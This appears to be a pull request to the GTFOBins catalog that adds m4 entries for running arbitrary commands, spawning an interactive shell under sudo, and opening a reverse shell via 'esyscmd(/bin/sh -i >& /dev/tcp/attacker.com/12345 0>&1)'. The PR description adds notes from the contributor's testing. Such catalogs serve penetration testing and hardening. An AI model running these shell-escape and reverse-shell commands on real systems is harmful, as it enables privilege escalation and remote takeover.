### PR TITLE
Expand m4 capabilities with command, reverse-shell and shell functions

### DIFF
--- a/_gtfobins/m4
+++ b/_gtfobins/m4
@@ -1,5 +1,11 @@
 ---
 functions:
+  command:
+  - code: |-
+      echo 'esyscmd(/path/to/command)' | m4
+    contexts:
+      sudo:
+      unprivileged:
   file-read:
   - binary: false
     code: |-
@@ -7,5 +13,18 @@ functions:
     contexts:
       sudo:
       suid:
+      unprivileged:
+  reverse-shell:
+  - code: |-
+      echo 'esyscmd(/bin/sh -i >& /dev/tcp/attacker.com/12345 0>&1)' | m4
+    contexts:
+      sudo:
+      unprivileged:
+    listener: tcp-server
+  shell:
+  - code: |-
+      echo 'esyscmd(/bin/sh </dev/tty >/dev/tty 2>&1)' | m4
+    contexts:
+      sudo:
       unprivileged:
 ...


### PR DESCRIPTION
In my tests there is no SUID for command/reverse-shell/shell - seems that shell drops privileges when spawned via esyscmd().

<img width="1668" height="502" alt="Screenshot From 2026-01-26 17-17-42" src="https://github.com/user-attachments/assets/66cbfbfa-cddc-4666-afbf-0b033b582438" />

<img width="2158" height="526" alt="Screenshot From 2026-01-26 18-08-07" src="https://github.com/user-attachments/assets/fc37da02-f7f8-428c-b446-88108202908d" />

<img width="2952" height="526" alt="Screenshot From 2026-01-26 13-35-48" src="https://github.com/user-attachments/assets/05e9fa17-ae06-4fbf-b3ff-5804ce701517" />

